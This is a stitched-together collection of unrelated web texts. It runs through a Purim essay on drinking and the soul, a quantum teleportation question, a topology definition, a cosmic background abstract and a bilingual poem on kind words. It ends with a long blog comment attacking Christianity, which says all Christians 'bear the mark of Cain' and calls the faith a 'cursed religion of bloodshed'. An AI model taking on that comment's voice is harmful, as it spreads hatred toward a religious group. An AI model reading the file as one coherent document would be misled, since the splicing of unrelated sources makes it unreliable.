But they did not despair, in spite of their predicament. They escaped from the danger into an inner place in their souls, and revealed forth new depth to themselves. They had never known beforehand that they possessed such stamina. When the decree was nullified, they merited to receive the Torah in a whole new way.
The Essence of Our Avodah on Purim
The big secret about Purim is to show us that during the rest of the year, we really do have the strength to uncover new depth about our soul. Although we do not face physical danger to our lives nowadays [of course, sometimes there are anti-Semitic events that take place in our times today, and this awakens us to feel an idea of what it felt like during the times of Haman’s decrees; but generally speaking, the Jewish people does not face genocide these days], on Purim, we are able to return to the inner depth of our souls, which was what the Jewish people revealed during the era of the Purim story. We must try on Purim to reach the level which the Jewish people attained on Purim.
When a person never matures in his spiritual situation, then even when he is seventy years old, he remains at the level he was like when he was seven. He continues to enjoy his childish antics even as he supposedly “matures” through life. Something that truly illustrates what we mean is the following example: We can find people who sincerely believe that Purim is about acting like a little child! Their entire Purim consists of costumes and decorative makeup, in a way most fitting for a child’s playgroup room.
But someone who has a matured at least a bit about his life – and we do not mean just physically, but that his heart has become more developed to sensing the inwardness in reality – if he is someone who at least searches a little for the truth, he understands clearly that Purim is something deep and profound. He understands that Purim is about revealing new depth to our soul, to reveal from ourselves abilities that we never knew about beforehand.
Every mitzvah we have on Purim contains depth to it. There is depth to the mitzvah of Mishloach Manos (sending gifts to our friends). There is depth to our mitzvah of reading the Megillah. There is depth to eating the meal of Purim. And there is depth to getting drunk on Purim – a great depth.
If a person wants to really know if he has grown spiritually from Purim, he should discern if he has revealed new depth to his soul as a result of drinking on Purim. He should ask himself: “Am I more self-aware now? Do I know things about myself now which I never knew about before? Or was just in another Purim that came and went, with nothing special about it…?”
One of the ways how we become more self-aware of our soul is through drinking on Purim. But as we cautioned before, getting drunk can backfire on a person, if he is the kind of person who should not be getting drunk; he will only spew forth negativity. Understandably, this is not the purpose of Purim.
If Chazal would have intended that people should get drunk on Purim in order to release all their negativity outward, then getting drunk on Purim would mean that we have to simply let loose; and then perhaps the person would have to write down how he behaved when he was drunk…
But, we know clearly that Chazal’s intention that we should get drunk on Purim was not so that should a person should release his negativity. It is about being more aware of the more inner layers in our soul. That is why ad d’lo yoda is only meant for one who has worked to purify and cleanse himself internally.
Higher Than The Subconscious: “Above” The Conscious
Now that we have explained at length about our conscious (kochos giluyim\revealed abilities) and our sub-conscious (kochos keihim\ hidden abilities) we can now explain another layer in our soul: the layer of the soul that is above our conscious. We will also explain how we reveal it on Purim.
Our conscious is what we aware of, while our subconscious is the part of our self that we aren’t aware of. We also are not aware of what lays above our conscious. This sounds like the same thing as our subconscious, but we will explain how they are different. What we also need to understand is, if the area above our conscious is clearly above our conscious thoughts, then how can we incorporate anything that’s above our consciousness into how we act, since action is on a lower plane than thought?
There is a fundamental difference between the sub-conscious and the above-conscious. Our sub-conscious is the desires in us which we are unaware of. These are things we want, but we aren’t aware that we want them; our deeper desires are hidden from us. By contrast, our above-conscious refers to the higher will that is implanted in us, which is leading us in how we act.
When we are aware of what we want, these desires are called our conscious. When we want something but we are unaware that we want it, this kind of desire is called a sub-conscious desire. Even if these sub-conscious desires are more powerful than our clearly revealed conscious desires, the deep desires are still considered to be only in our sub-conscious, since we are unaware of these deeper desires. But if we have deep desires which are actively affecting how we act in our life – and these are desires which we are unaware of – these desires are called our “above-conscious” desires.
The “above-conscious” desires are above a person, but they are desires that are actively affecting how a person acts, in spite of the fact that the person is unaware of these desires. We can compare this to a plane that in on auto-pilot. It seems to the onlooker as if the pilot sitting in the cockpit is the one who is controlling the plane, but the plane is really being controlled by a difference person, who is sitting far away in a control station.
Bechirah and Emunah
We will now sharpen the ramifications of this concept.
Whenever a person does anything, two forces are going on in his soul. One of them is called the power of bechirah (free will). The other force is called emunah (faith). When a person is acting upon his bechirah, his will to act is coming from within himself – whether he is aware of this consciously, or only subconsciously. By contrast, someone acting upon emunah is acting from above his conscious – he is being led by his emunah, which essentially means that he is being led by the Creator.
Our bechirah tells us that we are in charge, for we decide how we will act. We are either aware of this consciously or sub-consciously, but either way, when we use our bechirah, we think that we are in charge. By contrast, our above-conscious, our emunah, tells us that we are not in control, because there is a Higher Power in charge of us – the Creator.
The above-conscious is called so not just because we are unaware of it, but because it shows us that there are matters which are beyond our control that are guiding us; and their source is the Creator. So our sub-conscious and our above-conscious are the deep parts to our self which are controlling us. Most of our bechirah is not being utilized through our conscious state, but through our sub-conscious. When we consciously use our bechirah, it is about getting something done, but when it comes to choosing what we want, this bechirah is taking place in our sub-conscious. The sub-conscious is the source which is writing our desires into action.
Higher than our point of subconscious bechirah is our point of above-conscious. This is the higher power in a person which controls and directs a person’s life, and it is being provided by the Creator.
Intoxication on Purim Can Reveal Our Emunah
Now we can understand that the concept of “When wine enters, secrets come out” is not just referring to how wine reveals our subconscious into our conscious. Rather, the main purpose of the wine is to reveal to us the deeper force in us than our subconscious: our point of above-consciousness.
In other words, revealing the subconscious is not yet the ultimate level that can be reached on Purim. If a person merits to uncover more depth to his soul, the secret that the wine will reveal forth from him will be his innermost desire of the soul, the deepest ratzon (will) of his being – the will to do Hashem’s will.
This revelation that can take place does not just come as an additional piece of knowledge to the person, but as a soul experience. Let us explain this.
If anyone asked whom they believe is running the world, the answer is: “The Creator, Hashem.” But if someone is asked, “But is that how you feel?” then we will get different answers. Not everyone will answer in the affirmative.
The wine of Purim can help a person bring his knowledge about belief in the Creator to become an actual feeling. Through being intoxicated, the wine can transfer the above-conscious into our conscious state – through the means of our sub-conscious. A person will then be able to sense, in a palpable way, Who is running the world: only Hashem.
Megillas Esther: Revealing The Hidden
As is well-known, “Megillas Esther” can mean the revelation (Megillas, from the word giluy\revelation) of the hidden (esther, from the word hester\concealed or hidden). Megillas Esther reveals the hidden – it revealed matters which had previously been hidden. The word Megillah seems to be the total opposite concept of the word Esther, because Megillah refers to the revealed, while Esther refers to the hidden. But Megillas Esther shows us that it’s not a contradiction; it reveals what used to be hidden – that whatever was considered hidden until now has now become revealed.
It can be said, as a borrowed terminology, that every person contains in his soul a kind of “Megillas Esther.” The hidden parts to our self are our sub-conscious and our above-conscious, and Megillas Esther represents our ability to reveal the realm of the sub-conscious and the above-conscious into the realm of our consciousness. Our bechirah, which is present in our sub-conscious, is hidden from us; and our emunah, which is present above our conscious, is also hidden from us. Megillas Esther can show us how we can reveal these hidden parts to our self and bring them into our conscious awareness.
As we go throughout the day living our life, we are experiencing life through our conscious awareness, while we experience our subconscious only sometimes. Most people are not experiencing their above-conscious – their emunah. Even though most people will say that they believe in Hashem and that He’s running everything, there are very few people who are living and experiencing their emunah.
Megillas Esther is the megillah, the revelation, of the hidden. It shows us the hidden parts to our soul – our subconscious and our above-conscious. In the words of our Rabbis, the Megillas Esther can reveal to us our subconscious bechirah, and it can also reveal to us our emunah – our higher will, which is deep down guiding us.
The Meaning Behind Mishloach Manos
Another mitzvah that Chazal commanded us with in Purim is the mitzvah of Mishloach Manos, to send gifts of food to our friends. Let’s think into this. What does sending gifts to our friends have to do with the miracle of Purim, which is that we were saved from genocide?
As is well-known, the purpose of this mitzvah, Mishloach Manos, is to increase love and friendship between our fellow Jews. Simply, we understand about that this is accomplished in the best way by finding someone who we don’t like, and by giving him Mishloach Manos; and we hope that our enemy will open up the door for us when we show up at his house.
But the depth behind the mitzvah is that since our inner essence can become revealed on Purim, our inner love for other Jews will hopefully come with this – and that is why we are commanded to give Mishloach Manos on Purim.
Mishloach Manos must be sent from “man to his friend,” as the Megillah states, which implies that if you think there’s someone who you didn’t think was your friend yesterday, he’s really your friend! This is what Purim reveals – our inherent love with each other. Mishloach Manos is not just about giving to our friends; the main point of it is to give to those whom we aren’t friendly with, and to discover that they, too, are our friends. Through Purim, we can discover our subconscious; our subconscious tells us that we have bechirah and choose if we will hate others or not. Therefore, if we hate any Jew, it’s only because we are choosing to, and it’s the wrong decision to choose.
If we reach even deeper into ourselves on Purim, we reach our above-conscious, which is deeper than the sub-conscious. Our above-conscious reveals to us a deeper understanding than what we discover in our sub-conscious: that even if someone has hurt you in the past, it’s not him who hurt you; he was only a messenger of Hashem, because ultimately, it is Hashem who is in charge. If someone was supposed to get insulted and hurt by someone else, this was decreed on him by Hashem. When someone realizes this, his hatred toward his abuser will melt and eventually disappear.
This is the meaning of Mishloach Manos, gift-baskets that a “man sends to his friend.” Purim serves to reveal to a person a whole new inner depth, and upon reaching that deep perception, a person can send Mishloach Manos to others.
Purim Is Holier Than Yom Kippur
Understanding this, we can now come to appreciate the great spiritual benefit of the day of Purim. The sefarim hakedoshim explain that Purim is a holier day than Yom Kippur, because “Kippur” can be read “like Pur”, a hint to how Yom Kippur is almost as holy as Purim. This implies that Purim is holier than Yom Kippur.
What is the connection between Yom Kippur and Purim? They are both special opportunities to attain unity with other Jews. One’s sins are not for atoned on Yom Kippur unless he has been forgiven from any wrongdoing he did to others.
Purim is an opportunity to gain even an even higher degree of unity than the good terms with others that we must have on Yom Kippur. When we ask forgiveness from others, even if we are forgiven, there are still some hard feelings. The person who was hurt still feels that he was hurt even after he forgives the other, and it is just that he has forgiven the one who hurt him. But on Purim, the message of Mishloach Manos reveals to us a greater sense of bonding with others: that we are able to feel that no one did any harm to us at all. From that understanding, we strive to give Mishloach Manos.
Thus, the mitzvah of reading the Megillas Esther hints to us that on Purim, we can reveal the hidden. The mitzvah of Mishloach Manos and the mitzvah of ad d’lo yoda, as we explained, are also about revealing the hidden depth in ourselves.
Pre-Packaged Mishloach Manos
Something that has become popular in our times is that people go to the store and buy pre-packaged Mishloach Manos; some of them are more expensive than others. For someone’s close friends, he buys them an expensive package, and for those who he’s not as close with, he buys a cheaper one. There is already a greeting written on the Mishloach Manos that comes with the package, and the buyer simply fills in the name and address of where it has to go to, and whom it’s from. It is then sent through a delivery man (one thing they haven’t figured out yet, though, is how to get the deliverer to give it with his heart to the recipient…). In this way, people think that they have fulfilled the mitzvah of Mishloach Manos in the most beautiful fashion.
Any sensible person understands that this is not the intended kind of Mishloach Manos. When we give Mishloach Manos to others, it has to come from an inner place in ourselves, and not in the usual way that we give gifts to our friends during the rest of the year.
Every person should ask himself: “What is motivating me to give Mishloach Manos?” Of course, the main reason we are giving is because Chazal commanded us to. But if we perform this mitzvah mechanically and not from an inner place in ourselves, it’s like “a body without a soul”. The soul of Mishloach Manos is that we need to use it as a tool to reveal a sense of inner unity with other Jews.
If we reflect into what we said before, we can see that Purim is totally different than all other auspicious times of the year. We will not get into now what each Yom Tov reveals for us; but what we will say is something general, that each Yom Tov serves to reveal a special power of our soul. Purim is not like any other Yom Tov; Purim reveals the very root of our soul, a point that is way above our conscious state.
Revealing The Inner Essence of Purim
What is the root of Purim’s essence? Why indeed is Purim such a special time? It is because the Purim miracle that took place during the times of Mordechai and Esther transcribed only due to their mesirus nefesh (self-sacrifice for Hashem).
When a Jew has mesirus nefesh, besides for the fact that he gets eternally rewarded for this in the Next World, there is much more that he gains. Through mesirus nefesh for Hashem, a person reveals the depth of his soul – his true, inner self.
It is said in the name of the Arizal that the tzaddikim throughout the generations who were killed al kiddush Hashem (in sanctification of Hashem’s Name) did not actually experience any pain when they were being killed! This applies as well to Rabbi Akiva, who was killed by the Roman with iron combs; because he died al kiddush Hashem, he did not feel pain at all, even as he was being killed. How could such a thing be?? How could they not have felt pain? It is because when a person reaches mesirus nefesh, he reaches the inner essence of his soul, and his soul has an entirely different perspective on things. The soul of a person is able to view this situation with such loftiness that the person experiences no physical pain whatsoever.
The mesirus nefesh which Mordechai and Esther had is what enables them to reach the depth of their own souls, and this power is available as well as an accessible spiritual light that shines on Purim. When a person merits to access the spiritual opportunity of Purim, he merits as well to reach the deep revelation his own soul.
When One Cannot Differentiate Between Mordechai and Haman
Concerning our mitzvah to become intoxicated on Purim through wine, Chazal said: “One is obligated to become intoxicated on Purim ad d’lo yoda bein arur Haman l’baruch Mordechai (until he does not know the difference between ‘Cursed is Haman’ and ‘Blessed is Mordechai’).
How does a person reach such a level, in which he does not know the difference between how Haman is cursed and Mordechai is blessed? The simple understanding of this is that a person has to become so drunk to the point that he is totally confused, and then he can’t tell the difference between Mordechai and Haman.
But what still needs to be understood is: Why do Chazal want a person to become so drunk?
As is well-known, the words “Arur Haman” and “Baruch Mordechai” have the same gematria (numerical value in Hebrew); they both equal to be 502. This is meant to show us that when a person becomes so intoxicated to the point that he reaches the innermost point of his soul – his place in himself where he feels complete emunah in the Creator – he can then reach the understanding that just as Mordechai helped the generation see how everything is in the hands of Hashem, so did Haman serve to accomplish this!
This is the depth to the statement of Chazal, “The removal of the ring of Achashveirosh [to allow Haman’s decree] was greater than all the [accomplishments] of all 48 prophets and 7 prophetesses who prophesized for the Jewish people; for all of the prophecies did not cause them to repent, while Achashveirosh caused them to repent.”
Of course, this does not mean to imply that the wickedness of Haman is to be equated with the pure goodness of Mordechai. It is just that Haman was able to move us to do teshuvah, even more than our leaders and tzaddikim tried to do; and our enemy Pharoah is praised in a similar way, because his cruel decrees aroused the Jewish people to do teshuvah.
When a person understands simply that Mordechai and Haman are different, because Haman is cursed and Mordechai is blessed, then it shows that he’s only in his conscious state. When a person becomes intoxicated and he reaches lo yoda bein Arur Haman L’Baruch Mordechai, he has reached his subconscious; he realizes that Hashem is in charge of everything, and therefore he is able to realize how even Haman’s decree of genocide was constructive for the Jewish people, because ultimately, the decree is what moved us to teshuvah and thus be saved.
Balancing Efforts With Emunah
Chazal state that when Haman argued with Achashveirosh to issue the decree against the Jewish people, Hashem swore and said: “Because of you, two days of celebration will come to the Jewish people.” What is the depth behind this matter, that Purim came to us in Haman’s ‘merit’?
On Pesach, we drink four cups of wine; there is a specific amount of how much we drink. But on Purim, there is no set amount to drink; the amount is ad d’lo yoda. We drink more on Purim than in any other time of the year. The purpose of drinking on Purim, as we said, is to reveal our above-consciousness. If we go over to a person when he’s completely drunk – he’s above his consciousness – and we ask him if he is grateful to Haman, he might answer “Yes”. Now, if he would say this when he’s not drunk and he’s totally conscious, then we would assume he is drunk…
So although we can reach very high levels through getting intoxicated on Purim – to reach our emunah in Hashem – still, we cannot live on this plateau during the rest of the year. If someone tries to live on this level all the time, he will become disillusioned, erroneously thinking that it is forbidden to go to work for a living. He won’t be able to lead his life properly.
The point of the above-consciousness must only be accessed at times, and one cannot live in it all the time. It is like our general avodah of rotzoh v’shov (“running and returning” in our spirituality); our inner and external worlds need to always be integrated. When we use our inner world, we have the perspective of emunah, which shows us that Hashem is running everything; and from the viewpoint of external reality, we choose how we will act and we take responsibility. We are aware of ourselves and we worry for ourselves.
We need to balance these two views – the viewpoint of our inner reality, emunah, and the viewpoint from our external reality, our various efforts, choices, and responsibilities that we have. The balance between these two viewpoints is a very subtle thing to accomplish. We have to keep balancing our lifestyle between two opposing viewpoints – our emunah, and our hishtadlus\efforts.
Understandably, it is impossible to say how exactly we balance our life with both emunah and hishtadlus. Balance requires inner understanding from our part. There are some people who take emunah to an extreme, and they don’t make enough hishtadlus. Others are too drawn after hishtadlus and they are seriously lacking in their emunah. Both of these people are imbalanced.
We all need to be balanced. There are certain times in which we need to use emunah, and there are times in which we need to focus on hishtadlus, and it also depends on each person’s unique situation.
Summary of Our Goal On Purim
To make these matters practical, we will now provide a brief summary of what said here. The purpose of Purim is to reveal clearly our consciousness, our sub-conscious, and our above-conscious. To be clearer, on Purim we can become aware of how we want to act, as well as what we really want deep down – and ultimately, of Who is leading us [the Creator].
If a person reveals these aspects in himself over Purim, besides for the joy of Chedvah that he reaches – which is external joy – he also merits to express the inner joys known as Gilah, Rinah and Ditzah.
In order to reach true Simchas Purim, it is not enough to have superficial joy. We need to reveal inner happiness in ourselves. And when we reveal our inner happiness, we will discover that the happiness was there along, inside ourselves – but we never knew about it.
If a person feels after Purim that he now knows himself better than how he did before Purim, he has truly merited the “days of celebrations, joy and festivity” that Purim is. If he did not merit this, then his Purim has gone by like any other regular day of the year.
May Hashem merit all of us to rejoice together with true and complete happiness; that our consciousness (revealed aspects of our self) subconscious (hidden aspects of our self), and above-consciousness (our inner emunah) should all be perfected. And then, all of the Jewish people will merit to rejoice, together, with a complete heart.
Taanis 29a
Esther 8: 15-17.
Avos D’Rebbi Nosson 34
Rashi Shemos 17:16
Shemos 18:9
Toras HaOlah
Eruvin 65a
Tehillim 104: 15
Shir HaShirim 3:1
See the author’s series Getting To Know Your Thoughts
See Getting To Know Your Inner World: Chapter 5: The Intellect and the Heart.
Orach Chaim 695:2
Gittin 7b
Tehillim 92:3
Tehillim 104:15
Sotah is a married woman who is convicted of having marital relations with another man; if she has been properly warned by her husband and she is found guilty by two witnesses, she is brought to the Beis HaMikdash, where she must either drink the “Bitter Waters”, or confess her crime [whereupon she must get divorced]. If she drinks the water and she had been falsely accused, she is deemed innocent, and she merits blessing and long life. If she was indeed guilty, she dies from the water, in a most horrible fashion. The Sages say that one who observes this must become a Nazirite and abstain from wine. See Tractate Sotah of Talmud Bavli.
Berachos 63a
For more on how one can work on this perspective of emunah, see Bilvavi Mishkan Evneh, Part 3, Section VI: Emunah\Faith.
Yoma 85b
Megillah 7b
Megillah 14a
Shemos Rabbah 21
Yalkut Shimeoni Esther 1054 | <urn:uuid:550189b4-b955-4acc-a239-d4b39f77cf7e> | CC-MAIN-2023-14 | http://beyondbt.com/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950373.88/warc/CC-MAIN-20230402012805-20230402042805-00202.warc.gz | en | 0.973507 | 13,965 | 2.5625 | 3 |
In the context of quantum teleportation, my lecturer writes the following (note that I assume the reader is familiar with the circuit):
If the measurement of the first qubit is 0 and the measurement of the second qubit is 0 , then we have the state $\left|\phi_4\right>=c_0\left|000\right>+c_1\left|001\right>=\left|00\right>\otimes \left(c_0\left|0\right>+c_1\left|1\right>\right)=\left|00\right> \otimes \left|\psi '\right>$.
Now to get the final teleported state we have to go through the final two gates $Z, X$.
My lecturer writes this as;
$\left|\gamma\right>=Z^0X^0\left|\psi '\right>= \left|\psi'\right>= c_0\left|0\right>+c_1\left|1\right>$
Here are my questions:
Why is it that the we do not have $\left|\gamma\right>=Z^0X^0\left(\left|00\right>\otimes \left|\psi '\right>\right)$? I don't understand why we cut the state $\left|\phi_4\right>$ "in half ", to use bad terminology, at this step.
What does the superscript 0 on the operators refer to?
In the final state again to use bad terminology we only use half of the state $\left|\phi_4\right>$ can we always assume that the final state will be the $\left|\psi'\right>$ part of $\left|\phi_4\right>=\left|xy\right>\otimes\left|\psi'\right>$ state, and if so what is the significance of the final step.
If my question is unanswerable due to a deep misunderstanding of the math processes here, I'd still really appreciate some clarification on whatever points can be answered and I can edit it to make more sense as I learn. | <urn:uuid:85e655b1-5d5a-4155-bf9d-46d6e1a6b18c> | CC-MAIN-2023-14 | https://quantumcomputing.stackexchange.com/questions/5913/understanding-this-description-of-teleportation | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948965.80/warc/CC-MAIN-20230329085436-20230329115436-00602.warc.gz | en | 0.83147 | 483 | 2.921875 | 3 |
Definition:Hereditary Property (Topology)
Jump to navigation Jump to search
Let $\xi$ be a property whose domain is the set of all topological spaces.
Then $\xi$ is a hereditary property if and only if:
- $\map \xi X \implies \map \xi Y$
where $Y$ is a subspace of $X$.
That is, whenever a topological space has $\xi$, then so does any subspace.
- 1978: Lynn Arthur Steen and J. Arthur Seebach, Jr.: Counterexamples in Topology (2nd ed.) ... (previous) ... (next): Part $\text I$: Basic Definitions: Section $1$: General Introduction
- 1989: Ephraim J. Borowski and Jonathan M. Borwein: Dictionary of Mathematics ... (previous) ... (next): hereditary: 3. (of a topological property)
- 2014: Christopher Clapham and James Nicholson: The Concise Oxford Dictionary of Mathematics (5th ed.) ... (previous) ... (next): hereditary property | <urn:uuid:2db53fff-beaa-4538-b87d-a8dfe93ae138> | CC-MAIN-2023-14 | https://proofwiki.org/wiki/Definition:Hereditary_Property_(Topology) | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943471.24/warc/CC-MAIN-20230320083513-20230320113513-00003.warc.gz | en | 0.677286 | 239 | 3.09375 | 3 |
The cosmic background (CB) radiation, encompassing the sum of emission from all sources outside our own Milky Way galaxy across the entire electromagnetic spectrum, is a fundamental phenomenon in observational cosmology. Many experiments have been conceived to measure it (or its constituents) since the extragalactic Universe was first discovered; in addition to estimating the bulk (cosmic monopole) spectrum, directional variations have also been detected over a wide range of wavelengths. Here we gather the most recent of these measurements and discuss the current status of our understanding of the CB from radio to $\gamma$-ray energies. Using available data in the literature we piece together the sky-averaged intensity spectrum, and discuss the emission processes responsible for what is observed. We examine the effect of perturbations to the continuum spectrum from atomic and molecular line processes and comment on the detectability of these signals. We also discuss how one could in principle obtain a complete census of the CB by measuring the full spectrum of each spherical harmonic expansion coefficient. This set of spectra of multipole moments effectively encodes the entire statistical history of nuclear, atomic and molecular processes in the Universe.
Hill, Ryley; Masui, Kiyoshi W.; Scott, Douglas
2018, Applied Spectroscopy, 72, 663 | <urn:uuid:e2a3acff-4a88-4610-927c-38378f5ed409> | CC-MAIN-2023-14 | https://gabi.hyperstars.fr/2018/09/03/hill-masui-scott-2018-the-spectrum-of-the-universe/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948620.60/warc/CC-MAIN-20230327092225-20230327122225-00603.warc.gz | en | 0.891823 | 280 | 2.625 | 3 |
Never forget this:
- An angry word can hurt a sensitive heart.
- A word of reproach can cause tears to flow.
- An impatient and thoughtless word can darken a day that promised to be bright.
- A word of kindness can ease a hurting heart.
- A word of sympathy can comfort a soul in distress.
- A word of encouragement and hope can light a dark path.
N’oubliez jamais ceci :
- Un mot de colère peut blesser un Coeur sensible.
- Un mot de reproche peut faire couler des larmes.
- Un mot impatient et irréfléchi peut assombrir un jour qui s’annonçait radieux.
- Un mot de bonté peut soulager un Coeur qui souffrait.
- Un mot de sympathie peut consoler une âme en détresse.
- Un mot d’encouragement et d’espoir peut éclairer un chemin sombre.
🌼© Jeannette Bourassa 2022
10 commentaires sur « A Word ! | Un Mot ! »
Very nice, Jeannette. 💞
J’aimeAimé par 3 personnes
Thank you for taking time to read my post. Have a good day.
J’aimeAimé par 2 personnes
J’aimeAimé par 3 personnes
Growing Godly email@example.com For Us: Wonderful Counselor (Isaiah 9:1-7)
Your Title holds the thesis statement of your piece. Yet immediately you make a confused collage hodgepodge. Silly foreign alien to the Hebrew T’NaCH common law codification, running around like a chicken with its head cut off – has nothing what so ever to do with Godliness. T’NaCH prophets command mussar. The heart and soul of all T’NaCH literature, “your piece” remains blithely, completely oblivious there unto. Your piece speculates that the prophet had visions of your silly messiah counterfeit about a millennium before some Roman propagandist introduced the new testament.
The new testament narishkeit, appeared at the height of a series of Jewish Wars fought to expel the Romans from Judea. Half, if not more of the entire population of Judea died fighting those wars. The Romans would expel the survivors, sold and scattered across the Western Roman empire as captured slaves. Jews experienced a dark night of death, oppression, blood libels, taxation without representation, imprisonment behind dark ghetto walls without charges and unable to confront our accusers. The “Godly” European barbarians, their reign of absolute terror and injustice culminated in the first half of the 20th Century, when Godly Xtians murdered 75% of European Jewry in less than 4 years.
T’NaCH prophets command mussar. The T’NaCH does not exist as an ancient book of history. The stories within the pages of the T’NaCH teach Aggaditah. 1/4th of the Sha’s Bavli (Babylonian Talmud) teaches Aggaditic stories of mussar. The absolute arrogance of your religion, wherein priests and pastors, one and all, throughout some 2000+ years of cruel injustice and bloodshed, not limited only to Jewish minority refugee populations by a long shot, this religion of arrogance presumes that its religious elite can interpret and understand the T’NaCH completely divorced and removed from the culture customs practices and ways of the people who wrote all the Books of the T’NaCH and Talmud.
Prophetic mussar rebukes all generations living. It’s this unique quality which defines prophesy. Not only does your tumah arrogance not know the basic fundamentals of Yiddishkeit, for 2000+ years your priests and pastors remain blind to the central instruction of all the T’NaCH prophets – Mussar. Your silly narishkeit reads by rote and projects upon your pie in the sky JeZeus. But Jews have reconquered our homelands following the Shoah. My people rose from the grave yards of Europe and we rule and govern the oath sworn lands. Your pie in the sky narishkeit, no longer tolerated.
Justice – Jews have ceased existing as stateless refugee populations scattered across the face of the earth. Now the church rots and stinks in exile – waiting for the 2nd Coming of JeZeus the mamzer son of Mary. Much to the shock and dismay of Europe. European States of England, France, Germany, and Russia no longer sit as the Great Powers, who at a whim can carve nations into Spheres of Influence, like as done with 19th Century China. China’s Century of Shame, like that of the Israeli nation has ended. And your Roman based counterfeit religion never saw it coming.
Church corruption and oppression throughout its entire history on this Planet has shaped the din known as “Fear of Heaven” upon that cursed religion of bloodshed. All Xtians bear the mark of Cain unto all eternity. The days of your dominance and cruel misrule have reached their end. Both America and Europe – secular societies. Attacks made against Xtians mounts and increases as the years pass. The influence of priests and pastors withers and fades with each sex scandal or association of church finances with the Mafia. Rome sits perched in complete and total isolation. Popes ride in a heavily armored popemobile, to protect him from assassination.
[[[“””The prophet would go on to say, “The people will pass through the land, greatly distressed and hungry. And when they are hungry, they will be enraged and will speak contemptuously against their king and their God, and turn their faces upward. And they will look to the earth, but behold, distress and darkness, the gloom of anguish. And they will be thrust into thick darkness.” (Isa 8:21-22). While the Assyrian army invaded the land of Judah (tribal territories of Zebulun and Naphtali or more commonly known in NT as Galilee) leaving the land famished, empty and in total despair and darkness. Left alone, there was little hope in Judah. Isaiah’s prophecy in chapter 9 is in a verbal tense that the action is already completed, yet we know it was not. The prophet trusted God’s promises were already fulfilled because of His faithfulness to his covenant promise to give help and hope (Gen 12:1-3, Ps 105:8-11).”””]]]
Shall limit the study of Jewish common law to your quoted Isa 8:21-22. This cherry picking of verses manifests propaganda and any awareness of Jewish common law. The latter stands upon precedents. Both the T’NaCH and Talmud learn by means of making close precedent comparisons. This my 3rd comment upon your jibberish narishkeit, shall repeat: All T’NaCH p’sukim, contained within a larger sugia. Logic stands upon Order. The Order of the T’NaCH – sugiot. Your biblical translations, one and all, uprooted the Order of sugiot within the T’NaCH. As a consequence, Xtians lost the ability to learn within the context of a sugia.
T’NaCH common law compares sugiot with similar sugiot. The new testament books of propaganda make Joseph Goebbels proud. Ripping a p’suk\verse from its sugia contexts violates the principles of T’NaCH common law. Beginning with the New Testament itself, this counterfeit religion acted as if Jewish customs, culture and ways never existed. In the late 19th Century, German Protestant Higher Criticism made precisely this exact error. It viewed the T’NaCH as Paleontologists study fossils. Alas for these pathetic “scholars”, T’NaCH does not teach history. This fundamental error likewise defines all Xtian “scholarship” to this very day.
Church fanatics confuse ancient literature with history. While the T’NaCH shares tangential points with history, the T’NaCH Aggaditic stories teach mussar. Mussar does not depend upon the physical existence of any character within its pages. Aggaditah compares more to fictional novels rather than historical biographies. Church creeds, theologies, dogmatism, and doctrine absolutely requires a physical historical JeZeus. T’NaCH aggadic characters by stark contrast, their mussar instructs the generations of bnai brit Israel irregardless whether those characters of Aggaditah physically lived on this planet earth.
T’NaCH prophetic mussar commandments apply to all generations of bnai brit Israel, both with in the Constitutional Republic and in g’lut\exile. The prophets mussar seeks to arouse the hearts of my people to do t’shuvah. T’shuvah shares no common ground with “repentance”. The latter depends upon ‘Sin’. T’shuvah weighs the measure that bnai brit Man turns away from following and embracing assimilation to foreign cultures and customs of alien Goyim who never accepted the Torah at Sinai and Horev.
Xtianity, from its inception till today pays no heed to Jewish culture customs manners and ways. Therefore the Xtian notion of repentance operates in a completely different galaxy than does t’shuvah. Mitzvot learn from other mitzvot, just as Common law stands upon precedents. Torah commandments apply in both the oath sworn lands and g’lut. Observance of mitzvot, only Jews living within the oath sworn lands can sanctify mitzvot observance. Doing mitzvot לשמה defines all T’NaCH mitzvot. The opening Mishna of גטין\divorce/ teaches that g’lut Jewry lost the wisdom to do mitzvot לשמה. Observance of mitzvot לא לשמה defines g’lut Jewry like the cherry picking of p’sukim\verse defines the new testament fraudulent scriptures.
Ezra and the Men of the Great Assembly sealed the masoret known as the literature of the T’NaCH. The new testament attempt to enfranchise the new testament with the T’NaCH, it ignored the decree whereby Ezra and the Men of the Great Assembly, in the early formative years of the 2nd Commonwealth, whereby these sages sealed the literature of the T’NaCH. Later Jewish Alexandria Jewry writers, like Ben Sira and Egyptian Hellenistic writers of that jaundra era, their Apocrypha Books, excluded from the sealed T’NaCH masoret\tradition/Kabbalah. How much more so, the Roman counterfeit new testament narishkeit\non sense.
Xtians gossip among themselves and say that the only difference between Yiddishkeit and Xtianity, Jews reject Jesus as the messiah. No. Much more fundamental, Jews reject the religion of Xtianity which bases itself upon theologies and creeds rather than Common law. Doing mitzvot לשמה applies to all generations of Jews. The idea of messiah, whether he came or has yet to come, shares no common ground with the obligation to do mitzvot לשמה. No person can do mitzvot לשמה for other bnai brit. The foreign alien idea of the Roman Messiah, it shares no common ground with the T’NaCH faith of the obligation upon all bnai brit Jewry, in all generations to do mitzvot לשמה – the 1st commandment of the revelation of the Torah @ Sinai.
Why for example did the Wilderness generation die in g’lut. That generation accepted the revelation of the Torah @ Sinai! That generations did not accept the Torah לשמה. The Yatzir Ha’Rah seduces the hearts of all generations of bnai brit to do and keep the Torah לא לשמה – the 1st Commandment of the revelation of the Torah @ Sinai. Why does the first commandment @ Sinai make mention of Egypt. The Yatzir Ha’Rah continually seduces Israel to return back to Egypt. How? The Yatzir Ha’Rah encourages bnai brit Man to assimilate to the culture customs and ways practiced by the societies of both Egypt and Canaan. Assimilation defines avodah zarah – the 2nd commandment of the revelation of the Torah @ Sinai.
The avodah zara of both Xtianity and Islam, both “assimilate” and translate the Spirit Name of HaShem ie רוח הקודש\Holy Spirit/ unto words: YHVH, Yahweh, Jehovah, Lord, Father, Yeshuah, Jesus, Allah etc etc etc. Translating the רוח הקודש Name unto words defines the avodah zarah – the sin of the Golden Calf – the definition of the 2nd Commandment @ Sinai. Jews reject the new testament because it share no common ground with the common law Hebrew T’NaCH and Talmud. Many things depict the history of the church, but justice has no part or portion with that religion of avodah zarah. Now ‘Fear of Heaven’ exposes the trash name\destroyed reputation/ of Xtianity and the Xtian faith…’by their fruits you shall know them’.
